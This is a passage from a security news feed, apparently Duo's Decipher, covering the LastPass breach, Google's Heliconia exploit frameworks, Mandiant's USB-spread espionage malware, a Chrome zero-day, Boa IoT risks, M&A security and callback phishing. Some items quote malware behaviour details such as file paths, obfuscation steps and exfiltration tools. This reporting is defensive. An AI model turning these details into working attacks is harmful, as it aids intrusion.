you need to have a top down and bottoms up approach. I will give you an example; my last role, while I spent a lot of time doing awareness and education with our CEO and our executive team across in terms of business impact, and valuation impact and risk and having those tough conversation around risk and mitigations, at the same token, my team and I would spend time with our engineering team doing brown bag lunch and learn events in terms of secure coding, and what to be aware of and focus on vulnerabilities and why things matter. So you have to be able to dive into the details with everybody else, whether there's engineers or customer success or IT across the organization. At the same token you need to be able to elevate that conversation up with the board and executive team and meet somewhere in the middle. That's a transformative project, it takes time, there is a number of nuances that go into it and into making one of those programs successful. The check-the-box security awareness training and phishing test is not enough. You need to think through those systematically and and in a multifaceted way.

Lindsey O'Donnell-Welch: Are there any security threats that you think that organizations should be most aware of right now, especially going into 2023?

Lucia Milică: Absolutely, I want to call out a couple of them that actually were in our Voice of the CISO report, because I do think they are very much still top of mind for the security leaders across the globe. And one, the biggest one that we have seen a huge increase is insider risk, insider threats. That in itself has been not only called by our Voice of the Cisco - that we interview 1,400 CISOs globally - as the top cyber threats that they are focusing on. But we have also seen in a number of our own reports the insider threat rising exponentially across the board. So I think that is going to continue to be a huge area for for security leaders across the board. Interestingly, though, in our board report that was lower down on the list. The second one that continues to be an area that we all struggle with is supply chain risk. There's not a clear answer to solving it. We all know it's a challenge. We all rely on the limited toolsets that we have today. But that I think is a big area of concern in terms of cyberthreats and one that we're all trying to wrap our heads around.... And really, I think, at the core of it all, those are some of the examples, we really need to take a step back and get back to the core, which is that cybercriminals are continuing to target and exploit people. And we have to be able to focus on that multi-layer protection and strategy against the social engineering and overall, the human factor exploitations. We see that more than 90 percent of threats observed require some sort of a human interaction to execute. And those threat actors are regularly leveraging topical, timely, social, relevant themes as lures. And it's really important to be able to double down and focus on that human element as a defined layer of defenses for your organization, as a non negotiable. We've figured out our basic hygiene, and that's absolutely critical, you need to still focus on the basic hygiene, focusing on the people layer is key. And then last, but not least, data, as we know, is at the core of what threat actors are after, data is the new currency, as we all know. So focusing on defending the data broadly is really, really important. And actually, both the Voice of the CIO and the Board report both have information protection data governance, data classification as the top area of focus for the next 24 months for both CISOs and board members, which really underscored the need to focus on a broad data governance strategy.

<![CDATA[LastPass Says Attacker Accessed Customer Data]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/lastpass-says-attacker-accessed-customer-data https://duo.com/decipher/lastpass-says-attacker-accessed-customer-data

An attacker recently gained access to an outside cloud storage service used by LastPass and was able to obtain customer data, the company said Wednesday.

LastPass CEO Karim Toubba said that the intruder used some data stolen during a previous attack on the company’s network in order to get access to the cloud storage system. In August, LastPass disclosed that an attacker had compromised a developer account inside the company and used that access in order to steal some of the company’s source code and other information.

“We have determined that an unauthorized party, using information obtained in the August 2022 incident, was able to gain access to certain elements of our customers’ information. Our customers’ passwords remain safely encrypted due to LastPass’s Zero Knowledge architecture,” Toubba said.

“We are working diligently to understand the scope of the incident and identify what specific information has been accessed. In the meantime, we can confirm that LastPass products and services remain fully functional.”

Toubba said that none of the company’s products or services were affected by the intrusion. The August incident seems to have been more serious than the most recent one and clearly still having effects. That intrusion lasted several days and the attacker had direct access to the LastPass development environment. The good news in that case was that the development environment has no connection to the production environment, but whatever information the attacker was able to steal in that incident aided the second intrusion.

“Our investigation determined that the threat actor gained access to the Development environment using a developer’s compromised endpoint. While the method used for the initial endpoint compromise is inconclusive, the threat actor utilized their persistent access to impersonate the developer once the developer had successfully authenticated using multi-factor authentication,” Toubba said of the August incident.

“Although the threat actor was able to access the Development environment, our system design and controls prevented the threat actor from accessing any customer data or encrypted password vaults.”

LastPass’s password manager is used widely by enterprises as well as consumers.

<![CDATA[Google Exposes Heliconia Exploit Framework Targeting Chrome, Firefox, Windows]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/google-exposes-heliconia-exploit-framework-targeting-chrome-firefox-windows https://duo.com/decipher/google-exposes-heliconia-exploit-framework-targeting-chrome-firefox-windows

Google’s Threat Analysis Group has published details about a trio of newly discovered exploit frameworks that likely were used to exploit Chrome, Firefox, and Microsoft Defender vulnerabilities as zero days in the last few years.

The TAG team became aware of the frameworks when someone submitted three separate bugs to Google’s Chrome bug reporting system. Each of the three bugs included a complete framework for exploiting specific bugs, as well as source code. The frameworks are known as Heliconia Noise, Heliconia Soft, and Files. Heliconia Noise is a framework that includes a full one-click chain for exploiting a renderer bug in Chrome that was present in the browser from version 90.0.4430.72 to 91.0.4472.106 and was fixed in August 2021. Heliconia Soft exploits a flaw in Windows Defender, and Files is a group of exploits for Firefox on both Windows and Linux.

While looking into the vulnerabilities and frameworks, Google’s researchers discovered a script that was used to remove any sensitive information, such as server names and developer aliases, and it also contains a reference to Variston, which is a security firm in Spain. The TAG researchers believe Variston may have developed the exploit frameworks.

“Their Heliconia framework exploits n-day vulnerabilities in Chrome, Firefox and Microsoft Defender and provides all the tools necessary to deploy a payload to a target device. Google, Microsoft and Mozilla fixed the affected vulnerabilities in 2021 and early 2022. While we have not detected active exploitation, based on the research below, it appears likely these were utilized as zero-days in the wild,” the TAG researchers said in a post detailing the bugs and frameworks.

Google’s research shows that the frameworks are complex and mature and capable of delivering exploits to target machines with ease. The Heliconia Noise framework that targets Chrome has several components and also a reference to a separate sandbox escape exploit. The first stage of the chain is the use of a remote code execution exploit, followed by the sandbox escape, and finally the installation of an agent on the compromised machine.

“The framework runs a Flask web server to host the exploit chain. A full infection performs requests to six different web endpoints during the different stages of the exploit chain. The file names for each endpoint are randomized during server deployment, except for the first endpoint, which is served by a URL specified in the configuration file,” the Google researchers said.

“The framework allows setting parameters to validate visitors of the web server. Customers can configure target validations based on user agent, client country, client IP, and a client identifier used to track individual visitors. If any of the validation checks fail, the user is redirected to the preconfigured redirect URL.”

Heliconia Soft, which targets the Windows Defender security tool, contains an exploit for CVE-2021-42298, a flaw that Microsoft patched in 2021. The framework uses an exploit that gives the attacker system-level privileges and only involves the download of a PDF. When the victim downloads the PDF, it triggers a scan by Windows Defender.

“In the first stage, a PDF is served when a user visits the attack URL. The PDF contains some decoy content, plus JavaScript that contains the exploit. Like Heliconia Noise, it uses the custom JavaScript obfuscator minobf. The framework code performs checks to confirm that common exploit strings (“spray”, “leak”, “addr”, etc.) are not present in the obfuscated JavaScript. The framework inserts the PE loader shellcode and the launcher DLL as strings in the exploit JavaScript,” the Google analysis says.

“The growth of the spyware industry puts users at risk and makes the Internet less safe."

The final framework TAG discovered is called simple Files, and it contains an exploit for a Firefox bug that Mozilla patched earlier this year. That vulnerability (CVE-2022-26485) was exploited in the wild before it was disclosed in March, and Google’s researchers believe actors may have been using the exploit contained in the Heliconia Files framework for several years.

“TAG assesses that the Heliconia Files package likely exploited this RCE vulnerability since at least 2019, well before the bug was publicly known and patched. The Heliconia exploit is effective against Firefox versions 64 to 68, suggesting it may have been in use as early as December 2018 when version 64 was first released,” TAG said.

“Additionally, when Mozilla patched the vulnerability, the exploit code in their bug report shared striking similarities with the Heliconia exploit, including the same variable names and markers. These overlaps suggest the exploit author is the same for both the Heliconia exploit and the sample exploit code Mozilla shared when they patched the bug.”

There is also a sandbox escape exploit for the Windows version of Firefox. Google’s TAG researchers pointed to Heliconia as an example of the proliferation of commercial surveillance tools and how dangerous they can be for many groups of potential targets.

“The growth of the spyware industry puts users at risk and makes the Internet less safe, and while surveillance technology may be legal under national or international laws, they are often used in harmful ways to conduct digital espionage against a range of groups,” the researchers said.

<![CDATA[New Chinese Cyberespionage Campaign Targets Asia, US]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/new-chinese-cyberespionage-campaign-targets-asia-us https://duo.com/decipher/new-chinese-cyberespionage-campaign-targets-asia-us

A recently discovered attack campaign likely run by threat actors in China has been targeting public and private organizations in the Philippines, Europe, and the United States for perhaps as long as a year using multi-stage malware that is capable of self-replicating and is designed to steal data.

The campaign may have been ongoing since September 2021 but researchers at Mandiant discovered it recently, and found that the threat actor is relying on the older technique of deploying USB drives with malware on them as the initial infection vector. The attack includes the use of legitimate tools as well as several new pieces of malware, one of which has the ability to self-replicate onto new drives.

“Following initial infection via USB devices, the threat actor leveraged legitimately signed binaries to side-load malware, including three new families we refer to as MISTCLOAK, DARKDEW, and BLUEHAZE. Successful compromise led to the deployment of a renamed NCAT binary and execution of a reverse shell on the victim’s system, providing backdoor access to the threat actor,” an analysis by Mandiant researchers published Monday says.

“The malware self-replicates by infecting new removable drives that are plugged into a compromised system, allowing the malicious payloads to propagate to additional systems and potentially collect data from air-gapped systems.”

Unlike some other malware campaigns that rely on infected USB drives, the malware in this campaign does not execute automatically when a victim inserts the drive into a computer. Rather, the victim has to manually execute one of two files on the drive, both of which are renamed versions of a legitimate application called USB Network Gate. Once the victim executes one of those binaries, it sideloads the MISTCLOAK malware, which disguises itself as a DLL.

MISTCLOAK is essentially a launcher, which reads a specific encrypted file named usb.ini, which houses the second-stage payload, DARKDEW. This payload can be executed from either a removable drive or a hard drive.

“The malware self-replicates by infecting new removable drives that are plugged into a compromised system."

“If executed from a removable drive, DARKDEW will launch explorer.exe via explorer.exe “<drive>:\autorun.inf\Protection for Autorun” where is a removable drive letter, such as “E”. DARKDEW will then check if either C:\ProgramData\udisk\disk_watch.exe or C:\ProgramData\udisk\DateCheck.exe exist and will create the directory C:\ProgramData\udisk if neither are found,” the Mandiant analysis says.

After that’s done, the malware will copy all of the files from specific directories and then copy the modified USB Network Gate binary to disk and create a registry key to establish persistence. It then installs a file called datecheck.exe, which is a renamed version of another legitimate app called Razer Chromium Render Process. The app loads a legitimate DLL that then calls a function from the BLUEHAZE malware component. BLUEHAZE then creates a registry key for persistence and creates a reverse shell to a C2 address that is hard coded.

Mandiant attributed the campaign to an uncategorized actor it calls UNC4191 and said that the actor is likely located in China and its actions are aligned with the Chinese government’s political and economic goals.

“We believe this activity showcases Chinese operations to gain and maintain access to public and private entities for the purposes of intelligence collection related to China’s political and commercial interests. Our observations suggest that entities in the Philippines are the main target of this operation based on the number of affected systems located in this country that were identified by Mandiant,” the researchers said.

<![CDATA[Google Patches Heap Overflow Zero Day in Chrome]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/google-patches-heap-overflow-zero-day-in-chrome https://duo.com/decipher/google-patches-heap-overflow-zero-day-in-chrome

Google has released an update for Chrome on the desktop and Android that fixes a high-risk vulnerability that has been exploited in the wild.

The vulnerability (CVE-2022-4135) is a heap buffer overflow in Chrome’s GPU and could allow an attacker to execute arbitrary code on a target device. This is the eighth vulnerability that has been actively exploited in Chrome that Google has patched this year.

“Heap buffer overflow in GPU in Google Chrome prior to 107.0.5304.121 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page,” the bug description says.

The bug is in all versions of Chrome prior to 107.0.5304.121, and it affects both desktop and Android versions. Clement Lecigne of Google’s Threat Analysis Group reported this vulnerability, which lends some context to the discovery of an in-the-wild exploit. TAG is Google’s in-house team that tracks state-backed actors and APT groups and works to disrupt their operations. The group often identifies threat actors using exploits for zero days in the wild, and this is the third Chrome zero day that Lecigne has reported in 2022, along with a zero day in Internet Explorer.

It has been another busy year for researchers identifying exploits used in the wild for zero day vulnerabilities. In 2021, there were 68 such vulnerabilities reported publicly, and so far in 2022 there have been at least 33, according to data compiled by Google Project Zero researcher Maddie Stone.

Organizations that deploy Chrome on the desktop and/or on Android devices should update to the latest version as soon as possible.

<![CDATA[Discontinued Web Server Poses IoT Security Risks]]> lindsey@decipher.sc (Lindsey O’Donnell-Welch) https://duo.com/decipher/discontinued-boa-web-server-reveals-iot-supply-chain-risks https://duo.com/decipher/discontinued-boa-web-server-reveals-iot-supply-chain-risks

Researchers with Microsoft are warning that the Boa web server poses a security supply chain risk to Internet of Things (IoT) devices. Despite being discontinued and having various security flaws, the web server is continually used in a wide range of routers and cameras, as well as software development kits (SDKs), to access management consoles and device sign-in screens.

Microsoft identified the vulnerable open-source component when investigating a suspected Indian electric grid intrusion first detailed by Recorded Future in April, where attackers used IoT devices as a way to gain a foothold on operational technology (OT) networks. Upon closer look, Microsoft found that Boa web servers were running on all IP addresses that were published as IoCs in Recorded Future’s analysis. Microsoft researchers said the web server, discontinued in 2005, posed a security supply chain risk impacting millions of organizations and devices - and they identified 1 million internet-exposed Boa server components globally over the span of a week.

“Without developers managing the Boa web server, its known vulnerabilities could allow attackers to silently gain access to networks by collecting information from files,” according to Microsoft Security Threat Intelligence in a Tuesday analysis. “Moreover, those affected may be unaware that their devices run services using the discontinued Boa web server, and that firmware updates and downstream patches do not address its known vulnerabilities.”

The attacks on Indian critical infrastructure detailed by Recorded Future started in 2020 and were observed as recently as October, said Microsoft. While looking at the IP addresses listed as IoCs by Recorded Future, Microsoft researchers said that half of these addresses returned suspicious HTTP response headers that could be associated with deploying the malware used in the attack, and 10 percent of all the active addresses returning the headers were related to critical industries.

Microsoft researchers found that the electric grid attack targeted exposed IoT devices running Boa web servers - and they continue to see attackers attempting to exploit Boa flaws, showing it still poses as an attack risk. Some known Boa web server vulnerabilities include a high-severity information disclosure bug (CVE-2021-33558) and a high-severity arbitrary file access flaw (CVE-2017-9833), which enable threat actors to remotely execute code and require no authentication to exploit.

“Without developers managing the Boa web server, its known vulnerabilities could allow attackers to silently gain access to networks by collecting information from files."

Despite the severity of these flaws, downstream patch management is extremely difficult both due to the discontinuation of the web server and because of the complex nature of how it is built into the IoT device supply chain. In many cases, Boa web servers are bundled into SDKs, which are then used as part of IoT devices. These devices are then finally sold to end users, such as corporate or manufacturing companies.

This poses a number of issues. Both impacted device vendors and end users may be completely unaware that their devices are running the discontinued Boa web component, as there is limited visibility into impacted components within IoT devices and whether they can be updated. At the same time, updating IoT device firmware does not always fix the specific vulnerable components, in this case flaws in the Boa web servers.

“The known CVEs impacting such components can allow an attacker to collect information about network assets before initiating attacks, and to gain access to a network undetected by obtaining valid credentials,” according to researchers. “In critical infrastructure networks, being able to collect information undetected prior to the attack allows the attackers to have much greater impact once the attack is initiated, potentially disrupting operations that can cost millions of dollars and affect millions of people.”

The complex IoT environment and its barriers for patching have been previously highlighted by other IoT security issues. When researchers found nine flaws dubbed Name:Wreck in the popular TCP/IP stacks used by connected devices, for instance, they warned that many affected devices are not centrally managed and some vulnerable devices running the vulnerable firmware are mission-critical (such as medical devices or industrial control systems), meaning that they would be more difficult to take offline while applying patches.

Despite these challenges, Microsoft researchers recommended that organizations patch vulnerable devices whenever possible, use device discovery to identify vulnerable components across devices and eliminate unnecessary internet connections to IoT devices in the network.

“As attackers seek new footholds into increasingly secure devices and networks, identifying and preventing distributed security risks through software and hardware supply chains, like outdated components, should be prioritized by organizations,” said researchers. “This case displays the importance of proactive cyber security practices and the need to identify vulnerable components that may be leveraged by attackers.”

<![CDATA[Complex M&A Deals Pave Way For Security Gaps]]> lindsey@decipher.sc (Lindsey O’Donnell-Welch) https://duo.com/decipher/complex-m-and-a-deals-can-leave-security-lost-in-translation https://duo.com/decipher/complex-m-and-a-deals-can-leave-security-lost-in-translation

In late August, researchers with IronNet discovered a likely China-based threat actor that had infiltrated a U.S. software company through a troubling avenue: Legacy infrastructure from a company acquisition several years prior.

The threat actor used compromised VPN credentials to gain initial access to a compartmentalized segment of the business before deploying the Shack2 and China Chopper web shells. That segment, which contained unpatched, legacy systems like file servers, data repositories and consumer and transaction databases, belonged to a company that had been acquired by the unnamed targeted organization in 2014. Researchers in an analysis said they believe the attackers were on the networks for weeks or even months, conducting staging activity for further future exploitation with a possible end goal of stealing data or finding a pivot point to access production environments.

The incident points to the underlying security risks inherent in company merger and acquisition (M&A) activity, which has continued at a strong pace after the pandemic, with volumes increasing 64 percent year-over-year in 2021. Any time a company is going through any sort of change, it makes them particularly vulnerable to cyberattacks, say security experts - but the inherent complexity, speed and secrecy across the acquisitions process makes this landscape particularly lucrative for threat actors.

“The M&A space is a target with high financial stakes,” said Jason Button, director of Security and Trust M&A with Cisco. “Acquisitions made by large companies usually call for front page attention and that can make the acquired company a target. Hypothetically, take the scenario in which the parent and acquired companies prematurely connect their networks and or share sensitive data. If the acquired company has poor security, it could be an easy jumping off point to the parent company for much more valuable information.”

The impact of cybersecurity weaknesses or incidents at organizations is playing a bigger factor during the M&A process, with a 2019 Forescout survey revealing that 81 percent of IT and business decision makers were focused more on the acquisition target’s cybersecurity posture than in the past. Meanwhile, more than half of respondents said they had encountered a critical security issue or incident during an M&A deal that put the deal into jeopardy, showing that security weaknesses are having impacts on deals themselves. After a spate of data breaches was disclosed at Yahoo in 2016, for instance, Verizon in 2017 ended up acquiring the company for $350 million less than originally planned.

“Every environment is different, every acquisition is different, and many times you're navigating not only business strategy but emotional strategy,” said Button. “When it’s made public that a company is being acquired, it can make it a much larger target for bad actors. It is critical to plan and execute security improvements quickly.”

"If the acquired company has poor security, it could be an easy jumping off point to the parent company for much more valuable information.”

The M&A lifecycle has several stages that at a high level span the initial screening of a company and start of negotiations, the pre-announcement stage, signing and finalizing of the deal and the final integration.

During all of these phases, there are several steps that an acquiring company must make to determine the target organization’s security posture. Before the actual negotiations, when the acquiring company is going through its initial screening of the target company, it needs to identify the security and privacy risks of the company by conducting a detailed risk assessment and scoping out any early indicators of risk based on publicly available information, for instance. During the timeframe between pre-announcement to the signing of the deal, acquiring companies also need to conduct more active threat hunting and penetration tests after the deal is legally signed, and review processes to make sure they are aligned with their own security policies in place.

Visibility is key when approaching these different M&A stages so that the acquiring company can better understand the data that needs to be protected - whether it’s IP, credit card data, or GDPR-regulated information, for instance - and what the risks are that need to be managed.

However, M&A processes are often fast-moving, making it difficult to perform due diligence around important security measures and requirements. According to the Forescout survey, only 36 percent of respondents strongly agreed that their IT teams were given adequate time to review targets’ cybersecurity standards, processes and protocols before completing an acquisition.

The challenge around cybersecurity during the M&A process is also exacerbated by a lack of upfront communication that keeps key teams in the loop - including security teams - as well as important documentation that gives insight into this security posture.

Businesses often make the critical error of keeping security teams in the dark that an M&A is being explored, said James Christiansen, Netskope’s vice president of cloud security transformation and leader of the Global Chief Strategy Office. Security experts are engaged, along with the broader team, after the letter of intent is signed, but by then it’s too late to bring in these experts and fully understand the security posture of the target company as early as possible, he said.

“When going through that first phase of due diligence - before you get to the letter of intent and signatures - the acquiring company often is very very secretive about the fact that they’re going to be acquired,” said Christiansen. “It’s hard to get any real solid data out of them. Sometimes they’ll involve the chief security officer, and show their vulnerability reports and pen test results, but that’s the best you’ll get.”

“When it’s made public that a company is being acquired, it can make it a much larger target for bad actors. It is critical to plan and execute security improvements quickly.”

Morgan Demboski, threat intelligence analyst with IronNet, said that another top challenge for organizations acquiring another company is a lack of insight into documented assets, such as cybersecurity artifacts, technical documentation, and asset and data inventory.

“In the case we detected, the threat actors specifically targeted a network segment that was integrated through a prior company acquisition and contained legacy infrastructure,” said Bemboski. “Since this acquisition happened several years prior, there was likely not proper protocols and documentation in terms of technical infrastructure during the acquisition, and the network segment was likely forgotten about by the victim enterprise as a result. Though we do not know exactly how long the threat actor had access to the environment, it is apparent they were targeting the acquired network segment for a reason, likely to exploit the unmonitored legacy infrastructure within it.”

The processes needed to better understand key security risks facing a target company don’t end after an acquisition deal is signed and announced. For instance, Demboski said that when approaching the final integration phase, organizations must have a comprehensive integration strategy, as a lack of protocols can leave large security gaps when converging network systems. That includes dedicating time to asset/data identification, training, and planning the integration strategy to ensure nothing slips through the cracks, said Demboski, as well as establishing a governance model for ongoing incident handling and remediating any outstanding unpatched vulnerabilities.

The establishment of a security culture is one of the most important - and challenging - aspects of this integration phase, as different companies may have different views of the level of risk that they’re willing to take.

“It’s tough to change a culture,” said Christiansen. “In security we’re always looking at how we create a better, more aware culture. But when it comes to culture, it’s really interesting because at the business level there will be two cultures between the [acquiring and acquired] businesses. There might be a more risk averse and risk taking company. So you’ll start articulating those goals and getting them trained on your programs and what you expect. It’s all about encouraging behaviors.”

Across all these various stages of the M&A process, transparency is paramount, and both sides need to set clear expectations early on about priorities and how the companies are going to integrate, said Cisco’s Button.

“I can't stress that enough,” said Button. “Without this both sides will struggle from day one. After that, it's all about identifying, preferably before announcement, any vulnerabilities that need to be resolved in the acquiree’s people, process, or systems. Any or all three can be weak points that will need shoring up immediately.”

<![CDATA[Q&A: Dan Lorenc]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/q-and-a-dan-lorenc https://duo.com/decipher/q-and-a-dan-lorenc

Dan Lorenc, CEO and co-founder of Chainguard, joined Dennis Fisher on the Decipher podcast last week to discuss the rise of software supply chain security threats, the challenges of asset inventory and management, and the value of Sigstore for code signing. This is an edited and condensed transcript of their conversation.

Dennis Fisher: Where did the idea for what Chainguard is doing come from?

Dan Lorenc: I think the overall idea in the space of supply chain security kind of came up gradually. I was at Google for about nine years like you said I started there back in 2012 I think it was and worked on a bunch of different things throughout Google cloud platform. Kind of from backend infrastructure and then later out toward kind of open source developer tools in the container and Kubernetes space and Google in the 2012, 2013 timeframe that was right when big nation state attacks started happening to most of the big tech companies. I've heard similar things from Microsoft and Amazon. Pretty much all of the big tech companies started noticing. This was happening around then a lot of it's been talked about since at the time nobody was talking about it at all. It was top secret but it was kind of like a crazy revelation that you know in your job you might encounter nation States trying to attack you and you know they might even go as far as having folks go get jobs at the company and try to compromise it from inside and that kind of caught everybody in the industry by surprise back then. It's a little crazy to think about now when it happens all the time and it's pretty obvious, but back then it was new like folks weren't used to operating systems that way.

And so we spent a couple of years after that dealing with the fallout from realizing that you can't actually just blindly trust all employees to have access to all sensitive data when your company that size is dealing with that much sensitive information and systems had to be architected completely differently and baking in that culture of multi-party review and two-factor review to every single thing that happens not just access to production but code review, compilers kind of all of that stuff, and then when Kubernetes and containers and public cloud and Docker and everything started catching on a few years later and I started working on that, it was like stepping backwards like almost a decade and it was like wait a minute all that stuff we just built is gone now. Everybody's building stuff on Jenkins machines in closets and under their desks and nobody's tracking what goes into software and how it's getting built. And so that kind of made me pretty paranoid for some of the stuff I was building in open source and shipping and kind of led me down this rabbit hole. It was pretty boring for a while like yeah, nobody really cared about this at all and honestly just felt you're bothering everybody. Until SolarWinds happened honestly at the end of 2020, then it was like a night and day switch went off and everybody was like hey why haven't we been doing this for forever. It's so obvious in hindsight and so that's sort of how I got into this field, and the field kind of grew up.

Dennis Fisher: There was a lot of outward-facing changes that Google and other companies made, encrypting the links between their data centers and all that kind of stuff but it's cool to hear about the internal stuff too where you're looking inside and you're looking around and being like well why do we trust this system. Why do we trust this person?

Dan Lorenc: It's a big shift in the way you build systems and you know there's no perfect answer here. The best you can really do is have multiple people look at something in those situations because at the end of the day you are trusting people. Trusting people blindly is also terrifying especially when you're working on open source landscapes where you're taking code from anybody on the internet basically and if anybody has spent time on the internet, you realize that not everyone on the internet is a nice person and deserves your trust, and yeah it leads to kind of these inverted security setups in a lot of companies that we see too, just based on policies being applied. If you want to get a new vendor approved at a company you have to go through a crazy vendor approval process and security audits and budget approvals and all this stuff and it can take months. But if you just find an open source project on GitHub you can pull that in without asking anybody in most cases.

Dennis Fisher: You mentioned when the SolarWinds attack happened, which was the end of 2020, it seemed that was kind of a watershed moment for a lot of people in the security industry and also in the broader software industry I think too. They started looking at the dependencies and how many people had SolarWinds in their environment and how would they know if their version was compromised. So did you kind of look around and say, I told you. I was trying to tell you guys.

Dan Lorenc: Yeah, sort of. You know, a lot of it was like well you know you take this as an opportunity to do a tabletop exercise at your company. if this happened to us, like how hard would this be for us to detect and remediate and fix and do we actually have any controls in place that would have prevented this? A lot of organizations around the world are probably doing that around that same time and you know I've seen spreadsheets from CISOs of massive companies. They've showed me right after SolarWinds, that attack happened. You know we did an audit and you know we found 400 different Jenkins servers that were in use today across our company and it took us six months to do this and there's probably 100 more that have been spun up since then. And we really need to get a handle on this and it kind of raised that level of awareness to the executive level which is great, is kind of the only way you actually address something like this across the industry.

Dennis Fisher: Also I think there were a bunch of organizations that discovered that they had SolarWinds after that. I remember hearing stories from people that were like you know we found out four months later that we did have solar winds in our environment. We didn't even know.

Dan Lorenc: Yeah. Accurate asset inventory, accurate asset management, shadow infrastructure, kind of all of those things are a prerequisite to even being able to get started on supply chain security and a lot of folks are still struggling there.

"If anybody has spent time on the internet, you realize that not everyone on the internet is a nice person and deserves your trust."

Dennis Fisher: If you don't know what you have there's no way you can secure it. Are you still having to sort of stress the importance of that to potential customers when you're speaking to them?

Dan Lorenc: Exactly. Yeah I think if you followed the supply chain security space at all, you probably have heard the term SBOM, software bill of materials. You know it's being touted as one of the ways to help and improve supply chain security. And for anybody that doesn't know what it is and software bill of materials is mostly what it sounds like when you buy a piece of software. The vendor will include a bill of materials just like when you buy physical goods explaining what components and subcomponents and libraries are in there. The first part though is if you don't know what package software you bought in the first place is still running and where it's running then all the SBOMs in the world won't help. They're kind of one level removed from that in the SolarWinds case. Yeah, if you didn't know SolarWinds itself was running then it wouldn't matter that you could look up the SBOM or something and so getting an accurate asset inventory really is step zero. And any of these programs, if you don't know what software is running, you can't do patch management. You can't do vulnerability management. You can't ensure that it was built recently, you can't ensure that it was built securely. It's not easy in a lot of organizations to do that. Shadow Infrastructure is real. You know every customer we get into when we start putting in some of these asset inventory tools, they do find surprises. Everybody always finds surprising things in production. They don't know how that got there. It's scary in a lot of ways. SolarWinds obviously was the first big attack but one year later and we're coming up on the one-year anniversary of that again. So two years from the original one was Log4j, the Log4Shell vulnerability. it's about a worst case scenario vulnerability in an incredibly widely used component. That was about as easy to exploit with the most severe exploits possible. You know, kind of a worst case scenario from a vulnerability perspective. It's on the list of things attackers are going to try every single time and it doesn't have to work every time.

Dennis Fisher: When a lot of people think about software supply chain security, they're thinking about something like SolarWinds or Kaseya, where there was an attack that compromised a build or created a malicious version or something and that got pushed downstream. But Log4Shell is I think the much more insidious and problematic version.

Dan Lorenc: They're both big challenges right? And I think it's part of the confusion in the overall supply chain security space, is all these things get lumped together in one term. But they're completely different right? You know the attack on SolarWinds and Log4J are completely different things. You can't even call Log4J itself an attack. It was just an unintended bug that got found. So very different root causes. Very different solutions. Very different threat models too and folks are kind of struggling to wrap their head around the differences there and I think yeah to your point folks either jump on one side or the other side. Heartbleed was kind of the first eye-opener for most folks that hey, open source is everywhere and all code has bugs and some of those bugs can lead to security consequences. We should try to fix those and it's great that folks are trying. We're not going to fix them all, right? It's just software, right? You can't fix all the bugs. We should try though.

Dennis Fisher: I wanted to ask you a little bit about the Sigstore project, because I know you guys are sort of involved in it and I know Google is a big supporter of it. So what's the simplest way to explain to folks how Sigstore works?

Dan Lorenc: Sure I can start out with a high-level explanation and then talk about some of the history of it.. So if you're familiar with Let's Encrypt, it is a free service that gives out TLS certificates for websites. if you remember the internet before maybe five or six years ago most websites still did not have those certificates. You'd get little red x's when loading those or , it would be http only. And that was really dangerous right? If you logged into your bank without this then like you're sending your password over plain text on the internet and anybody in the middle can read that and do bad things. These certificates weren't new. They've been around since like the early 90 s but they were hard to get because it was manual. They fix this by building a new standard for websites to automatically go do all of that kind of exchange so nothing manual over email anymore. You could prove that you were the owner of a website. Automatically, they'd give you a certificate. Because it was all automated. They were only good for a couple weeks instead of years. So if somebody stole one. The damage was more limited. Adoption of TLS went from 50% to like 95% or 99% over just a couple years when it was made easy for folks. So we've been talking about Let’s Encrypt. How this relates to Sigstore, with Sigstore we try to do that very same thing but for signing code. There's also existing code signing certificates. You're trying to prove which person or company produces some code rather than encryption. But for the most part, the sort of certificates look the same. You can go buy one today you can pay a couple hundred bucks, send them a government ID, they'll send it back to you. It's good for a few years but for the most part, no one in open source was doing that and nobody is doing that outside of the kind of walled gardens where it's required. You need to do that to publish Windows drivers or you need to do something similar to publish an app to the iPhone store and this technology is around. It's just hard to use so we thought, how about we try to automate that, make it easy, make it free for developers and see if folks want to do it and so that's where Sigstore came in. Sigstore runs a free certificate authority. There's some cool technology with stuff like transparency logs and Merkle trees to make it all work and trustable. But at the end of the day a developer can run a command, their browser pops open. They verify their identity with, you know, an email address or a GitHub account or any common identity provider. They get a certificate tied back to that and then they're good to go. They can sign their code with it so you can use this with container images and npm packages, python packages, Java packages, pretty much any open source artifact distribution mechanism now supports Sigstore.

<![CDATA[Threat Actors Find Success in Callback Phishing Attacks]]> lindsey@decipher.sc (Lindsey O’Donnell-Welch) https://duo.com/decipher/threat-actors-find-success-in-callback-phishing-attacks https://duo.com/decipher/threat-actors-find-success-in-callback-phishing-attacks

A threat actor has been using callback phishing - a known social engineering tactic that involves attackers talking to victims over the phone - as a way to download legitimate, trusted systems management tools on victim computers, with the end goal of manually exfiltrating data for extortion.

The threat actor has targeted multiple organizations across the legal and retail sectors from mid-May to late October in attacks that have cost victims thousands in dollars and have had a high success rate, according to researchers with Palo Alto Networks’ Unit 42 team. That high success rate is part of the reason that callback phishing as a method has been increasing in popularity among threat actors overall. According to an August report by Agari, hybrid voice phishing attacks like callback phishing increased 625 percent in the second quarter of 2022 over the first quarter. BazarLoader attackers were first observed leveraging this tactic in attacks that used a mix of emails and phone-based “customer service representatives” in order to direct victims to download a malicious file.

“By design, this style of social engineering attack leaves very few artifacts because of the use of legitimate trusted technology tools to carry out attacks,” said Kristopher Russo, senior threat researcher with Unit 42, in a Monday analysis. “However, Unit 42 has identified several common indicators implying that these attacks are the product of a single highly organized campaign. This threat actor has significantly invested in call centers and infrastructure that’s unique to each victim.”

The attack starts with a phishing message to a target's corporate email address, which includes an attached invoice (typically for under $1,000) and tells the target that his credit card has been charged for a service. The email includes a phone number and unique ID, and when the target calls the number to inquire about the charge he reaches a live agent that is part of an attacker-controlled call center. Under the guise of helping the target, the "live agent" then guides the target through downloading the Syncro remote support tool, enabling the threat actor to install a remote administration tool.

The threat actor then exfiltrates valuable data from the system via file transfer tools like Rclone or WinSCP and later sends an extortion email demanding the victim pays a fee or the data will be released, sometimes threatening to contact the victim's customers or clients to increase pressure to pay.

“While groups that can establish infrastructure to handle inbound calls and identify sensitive data for exfiltration are likely to dominate the threat landscape initially, a low barrier to entry makes it probable that more threat actors will enter the fray."

